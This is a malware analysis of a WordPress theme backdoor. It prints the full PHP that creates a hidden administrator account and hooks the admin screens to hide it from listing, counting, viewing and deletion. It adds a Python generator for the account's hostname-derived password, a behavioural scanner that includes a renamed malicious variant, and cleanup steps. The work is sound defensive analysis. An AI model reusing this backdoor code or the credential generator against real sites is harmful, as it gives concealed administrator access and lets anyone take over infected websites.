Hidden WordPress Admin Backdoor Malware – In-Depth Technical Review

July 30, 2025

Issue Reported

Malicious PHP code was found in a WordPress theme's functions.php file. It is a backdoor that creates a hidden administrator account and then hooks the WordPress admin interface so that the account is neither listed, counted, viewable nor deletable through normal means.

Malware Type

Hidden Administrative Backdoor – a persistence mechanism that creates a concealed administrator account on first run and then shields it from listing, editing and deletion inside the WordPress admin. Classified as WordPress backdoor admin-creation malware.

Code Breakdown and Decoding

Primary Malware Functions

The malware consists of five interconnected PHP functions designed to create and maintain unauthorized administrative access:

1. auto_create_fallback_admin() – Core Backdoor Function

function auto_create_fallback_admin() {
    // Runs on every 'init'. It only acts when the backdoor account is missing,
    // so deleting the user without removing this code recreates it on the next request.
    $user = get_user_by('login', 'adm1nlxg1n');

    if (!$user) {
        // Derive the password from the site's hostname with the dots stripped.
        $site_url = site_url();
        $parsed_url = parse_url($site_url);
        $domain = str_replace('.', '', $parsed_url['host']);
        // Integers index into $domain; strings are appended literally.
        // A position past the end of a short hostname contributes '' (the ?? fallback).
        $template = array(2, 'X', 3, '3', 0, 'Y', 1, '1qP', 4, 6, 'x', 'K', 5);
        $result = '';
        foreach ($template as $item) {
            $result .= is_int($item) ? ($domain[$item] ?? '') : $item;
        }

        $args = array(
            'user_login' => 'adm1nlxg1n',
            'user_pass' => $result,
            'role' => 'administrator',
            'user_email' => 'wordpresupportadm11@gmail.com'
        );

        // Create the account and store its ID for the concealment hooks below.
        // On failure wp_insert_user() returns a WP_Error, which is stored as-is.
        $id = wp_insert_user($args);
        update_option('_pre_user_id', $id);
    }
}

Password Generation Algorithm Analysis:
The password is never written into the file as a literal. The code reads the site's hostname from site_url(), strips the dots, and walks a fixed template: integer entries pick a character of the stripped hostname by position, string entries are appended as-is. The result is deterministic, so anyone who knows the template (that is, anyone who has read this sample) can compute the password for any infected site from its hostname alone. The scheme hides the credential from string-matching scanners, not from analysts.

  • Template: [2, 'X', 3, '3', 0, 'Y', 1, '1qP', 4, 6, 'x', 'K', 5]
  • Process: integers reference character positions (0-based) in the dot-stripped hostname, strings are added literally
  • Example: for example.com → examplecom → password aXm3eYx1qPpexKl
  • Caveat: the hostname includes any www prefix (www.example.com yields a different password), a port in site_url() is not part of the host, and positions beyond the end of a short hostname contribute nothing ($domain[$item] ?? ''), so a hostname shorter than seven characters produces a shorter password
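The derivation above, re-implemented as an added example for this write-up (it is not code from the sample or from any WordPress project). It lets a responder compute the credential the attacker would use against a given site, and it goes slightly beyond the article's single example by covering the cases the sample's own code implies: a port in site_url(), a www prefix, and a hostname shorter than the highest template index. The TEMPLATE and login are copied from the sample; the site URLs are constructed inputs.

```python
"""Reproduce the backdoor's hostname-derived password (added example)."""
from urllib.parse import urlparse

# Template copied verbatim from the sample: integers index into the
# dot-stripped hostname, strings are appended literally.
TEMPLATE = (2, "X", 3, "3", 0, "Y", 1, "1qP", 4, 6, "x", "K", 5)


def php_host(site_url: str) -> str:
    """Approximate PHP parse_url($url)['host']: keep the hostname's case and
    drop any userinfo and port. (Python's urlparse().hostname would lower-case it.)"""
    netloc = urlparse(site_url).netloc
    return netloc.rsplit("@", 1)[-1].split(":", 1)[0]


def derive_password(site_url: str, template=TEMPLATE) -> str:
    """Mirror auto_create_fallback_admin()'s derivation.

    PHP's `$domain[$i] ?? ''` yields '' for an offset past the end of the
    string, so a short hostname silently produces a shorter password rather
    than an error; the bounds check below reproduces that behaviour.
    """
    domain = php_host(site_url).replace(".", "")
    parts = []
    for item in template:
        if isinstance(item, int):
            parts.append(domain[item] if item < len(domain) else "")
        else:
            parts.append(item)
    return "".join(parts)


def credentials_for(site_urls, login="adm1nlxg1n"):
    """Map each site URL to the (login, password) pair this variant would create."""
    return {url: (login, derive_password(url)) for url in site_urls}


if __name__ == "__main__":
    # Constructed inputs: the article's own example plus the edge cases above.
    for url, (login, pw) in credentials_for([
        "https://example.com",
        "https://www.example.com",
        "https://example.com:8443/blog",
        "http://ab.io",
    ]).items():
        print(f"{url:32} {login} / {pw}")
```

A practical use is to feed the hostnames of every site on a shared host through credentials_for() and then test whether the adm1nlxg1n login exists on each; the password itself is only needed if you want to confirm the variant matches rather than merely that the account is present.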

2. wc_tool_query_fallback() – User List Concealment

function wc_tool_query_fallback($user_search) {
    // Fires on 'pre_user_query' for every WP_User_Query: the Users screen,
    // get_users(), and WP-CLI's "wp user list" while the theme is loaded.
    $user_id = get_current_user_id();
    $id = get_option('_pre_user_id');
    // Do nothing if creation failed (a stored WP_Error) or if the backdoor
    // account itself is logged in, so the attacker sees the full user list.
    if (is_wp_error($id) || $user_id == $id) return;
    global $wpdb;
    // "{$id}={$id}" is a tautology standing in for "1=1"; the real work is ID<>{$id}.
    $user_search->query_where = str_replace('WHERE 1=1',
        "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}",
        $user_search->query_where);
}

This function runs on the pre_user_query action, which WP_User_Query fires just before executing its SQL. It rewrites the WHERE clause so the backdoor account's row is excluded from every listing built on WP_User_Query: the Users screen, get_users(), and WP-CLI's wp user list while the theme is loaded. The row itself is untouched in wp_users; only query results omit it, which is why a direct database query still shows the account. The exclusion is skipped when the backdoor account is the one logged in, so the attacker sees a normal user list.

3. protect_user_count_fallback() – Count Manipulation

function protect_user_count_fallback($views) {
    // $views['all'] is markup such as '<a href="users.php">All <span class="count">(5)</span></a>';
    // split on the parentheses, decrement the number and reassemble the string.
    $html = explode('(', $views['all']);
    $count = explode(')', $html[1]);
    $count[0]--;
    $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1];
    // The same manipulation is applied to the Administrator count. The original
    // sample elides this branch; it is reconstructed here from that description.
    if (isset($views['administrator'])) {
        $html = explode('(', $views['administrator']);
        $count = explode(')', $html[1]);
        $count[0]--;
        $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1];
    }
    return $views;
}

4. wc_tool_profiles_fallback() – Profile Access Prevention

function wc_tool_profiles_fallback() {
    // Hooked on load-user-edit.php, i.e. before the profile screen renders.
    $user_id = get_current_user_id();
    $id = get_option('_pre_user_id');
    // Anyone other than the backdoor account asking for its profile receives
    // WordPress's own "Invalid user ID." error, the same text a genuinely bad ID gives.
    if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) {
        wp_die(__('Invalid user ID.'));
    }
}

5. protect_user_from_deleting_fallback() – Deletion Prevention

function protect_user_from_deleting_fallback() {
    // Hooked on admin_menu, which runs on every wp-admin page before users.php
    // handles its actions, so this check sees the delete request first.
    $id = get_option('_pre_user_id');
    // Blocks ?action=delete&user=<backdoor id>. The extra !get_userdata() clause
    // also rejects nonexistent IDs, so the response looks like an ordinary error.
    if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action'])
        && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) {
        wp_die(__('Invalid user ID.'));
    }
}

Stealth and Evasion Techniques

  • Disguised Username: adm1nlxg1n rather than an obvious "admin"; the leetspeak still reads as an administrative account at a glance
  • Legitimate-Looking Email: wordpresupportadm11@gmail.com imitates a WordPress support address
  • Query-Level Hiding: the pre_user_query hook removes the account from listings built on WP_User_Query; the row stays in wp_users, so the hiding depends entirely on the theme code remaining in place
  • Count Manipulation: the views_users filter subtracts one from the displayed All and Administrator counts so the totals agree with the shortened list
  • Access Protection: profile views (user-edit.php) and delete actions aimed at the account are answered with the stock "Invalid user ID." message, indistinguishable from a real bad ID
  • Derived Password: no credential string exists in the file for a scanner to match, yet the attacker recovers the password from the hostname alone

WordPress Hook Integration

The malware registers its functions with standard WordPress hooks, so it needs no cron job, no obfuscation and no additional files:

  • add_action('init', 'auto_create_fallback_admin') – runs on every request, front end and admin alike; it creates the account only when it is missing, so deleting the user while this line remains brings it back on the next request
  • add_action('pre_user_query', 'wc_tool_query_fallback') – excludes the account from every WP_User_Query
  • add_filter('views_users', 'protect_user_count_fallback') – adjusts the counts shown above the user list
  • add_action('load-user-edit.php', 'wc_tool_profiles_fallback') – blocks the account's profile page
  • add_action('admin_menu', 'protect_user_from_deleting_fallback') – runs early on every wp-admin page and blocks ?action=delete&user=<id>

None of these hooks fires under WP-CLI when the theme is skipped (--skip-themes), and admin_menu does not fire outside wp-admin at all, which matters for cleanup.
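The hooks listed above are the part of this technique an attacker cannot rename, so they make a better detection target than the function names. The following is an added example for this write-up (not part of the original analysis and not a vendor's scanner): it scores PHP source on the behaviours described here, extracts the hard-coded login, e-mail and option key as IOCs for cleanup, and is run over two constructed inputs: a renamed variant of the sample that a name-based signature would miss, and a benign functions.php. The weights and threshold are assumptions for the example.

```python
"""Behavioural scan of PHP theme/plugin files for the hidden-admin pattern (added example)."""
import re
from pathlib import Path

# (label, pattern, weight). Concealment hooks weigh more than account creation
# because legitimate code occasionally creates users but almost never hides them.
INDICATORS = [
    ("creates a user with wp_insert_user()",
     re.compile(r"wp_insert_user\s*\("), 2),
    ("assigns the administrator role in code",
     re.compile(r"['\"]role['\"]\s*=>\s*['\"]administrator['\"]"), 2),
    ("hooks pre_user_query",
     re.compile(r"add_action\s*\(\s*['\"]pre_user_query['\"]"), 3),
    ("rewrites query_where via str_replace('WHERE 1=1')",
     re.compile(r"->query_where\s*=\s*str_replace\s*\(\s*['\"]WHERE 1=1['\"]"), 3),
    ("filters views_users (user count display)",
     re.compile(r"add_filter\s*\(\s*['\"]views_users['\"]"), 2),
    ("hooks load-user-edit.php (profile access)",
     re.compile(r"add_action\s*\(\s*['\"]load-user-edit\.php['\"]"), 2),
    ("intercepts action=delete on users.php",
     re.compile(r"\[['\"]action['\"]\]\s*==\s*['\"]delete['\"]"), 1),
]
THRESHOLD = 6  # creation alone scores at most 4; creation plus any concealment hook trips it

# Hard-coded values worth pulling out as IOCs for the cleanup steps.
IOC_PATTERNS = {
    "user_login": re.compile(r"['\"]user_login['\"]\s*=>\s*['\"]([^'\"]+)['\"]"),
    "user_email": re.compile(r"['\"]user_email['\"]\s*=>\s*['\"]([^'\"]+)['\"]"),
    "options":    re.compile(r"update_option\s*\(\s*['\"]([^'\"]+)['\"]"),
}


def scan_php(source: str) -> dict:
    """Score one PHP source string and extract its hard-coded IOCs."""
    hits = [(label, w) for label, rx, w in INDICATORS if rx.search(source)]
    score = sum(w for _, w in hits)
    return {
        "score": score,
        "verdict": "hidden-admin backdoor" if score >= THRESHOLD else "no match",
        "hits": [label for label, _ in hits],
        "iocs": {name: rx.findall(source) for name, rx in IOC_PATTERNS.items()},
    }


def scan_tree(root: str) -> dict:
    """Scan every .php file under root (wp-content/themes, plugins, mu-plugins)."""
    return {str(p): scan_php(p.read_text(errors="replace"))
            for p in Path(root).rglob("*.php")}


# Constructed sample: the same technique with every function renamed and the
# option key changed, which a signature on the original names would miss.
RENAMED_VARIANT = """<?php
add_action('init', 'theme_fallback_setup');
function theme_fallback_setup() {
    if (!get_user_by('login', 'svc_backup')) {
        $uid = wp_insert_user(array('user_login' => 'svc_backup', 'user_pass' => 'x',
            'role' => 'administrator', 'user_email' => 'backup@example.invalid'));
        update_option('_theme_uid', $uid);
    }
}
add_action('pre_user_query', 'theme_fallback_query');
function theme_fallback_query($q) {
    global $wpdb; $id = get_option('_theme_uid');
    $q->query_where = str_replace('WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.ID<>{$id}", $q->query_where);
}
add_filter('views_users', 'theme_fallback_views');
add_action('load-user-edit.php', 'theme_fallback_profile');
add_action('admin_menu', 'theme_fallback_delete');
function theme_fallback_delete() {
    if (isset($_GET['action']) && $_GET['action'] == 'delete') wp_die('Invalid user ID.');
}
"""

# Constructed benign functions.php for comparison.
CLEAN_THEME = """<?php
add_action('after_setup_theme', 'mytheme_setup');
function mytheme_setup() { add_theme_support('title-tag'); }
add_filter('excerpt_length', function ($n) { return 30; });
"""

if __name__ == "__main__":
    for name, src in (("renamed variant", RENAMED_VARIANT), ("clean theme", CLEAN_THEME)):
        r = scan_php(src)
        print(f"{name}: score={r['score']} verdict={r['verdict']} iocs={r['iocs']}")
```

The extracted iocs tell the cleanup which login to look for in wp_users and which option row to delete from wp_options, so the procedure below does not have to assume the names from this particular sample. Expect some false positives from membership or user-management plugins that legitimately touch views_users; the threshold is deliberately set so that creating a user is not enough on its own.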

Security Impact and Persistence

This sample shows persistence mechanisms typical of WordPress backdoors:

  • Automatic Execution: the init hook runs the creation check on every request
  • Self-Protection: the list, count, profile and delete hooks form several layers, but each of them only conceals; none prevents removal through the database or the file system
  • Administrative Access: an administrator can install plugins and edit theme files, which amounts to arbitrary PHP execution on the server
  • Re-creation: as long as the five functions remain in functions.php, deleting the account alone is undone on the next page load and _pre_user_id is simply updated to the new ID

The code uses only documented WordPress APIs and contains no eval(), base64 or other obfuscation, which is why scanners that key on those patterns tend to miss it. Detection has to look at what the code does, for example a theme file that calls wp_insert_user() with the administrator role or rewrites WP_User_Query's WHERE clause.

Result

  • Remove Malicious Code first: delete all five functions and their add_action/add_filter lines from functions.php, and check the parent theme (if this is a child theme), other installed themes, plugins and wp-content/mu-plugins for copies. While the code is in place the account is recreated on every request, so this step must come before the next one.

  • Delete Malicious User: once the hooks are gone the adm1nlxg1n account appears in the Users screen again and can be deleted normally (reassign its content to a known-good user). If the account has to be removed before the file is cleaned, do it outside the hooks: WP-CLI with --skip-themes and --skip-plugins, or directly in the database.

  • Clean Database: delete the _pre_user_id row from wp_options.

  • Verify: list administrators straight from the database (wp_users joined to wp_usermeta on the wp_capabilities key, using the site's table prefix) rather than through the dashboard, and confirm that adm1nlxg1n and any other unexpected administrator are gone.

  • Password Reset: change every administrator password and rotate the AUTH_KEY/SALT constants in wp-config.php so that existing sessions, including any the backdoor account opened, are invalidated.

  • Security Scan: perform a comprehensive malware scan for additional backdoors; whoever wrote to functions.php had write access to the site, and that access may have been used elsewhere.

  • File Integrity Check: compare WordPress core against a clean copy of the same version (wp core verify-checksums), then do the same for plugins and themes against their distributed packages.

Screenshots

Screenshot 1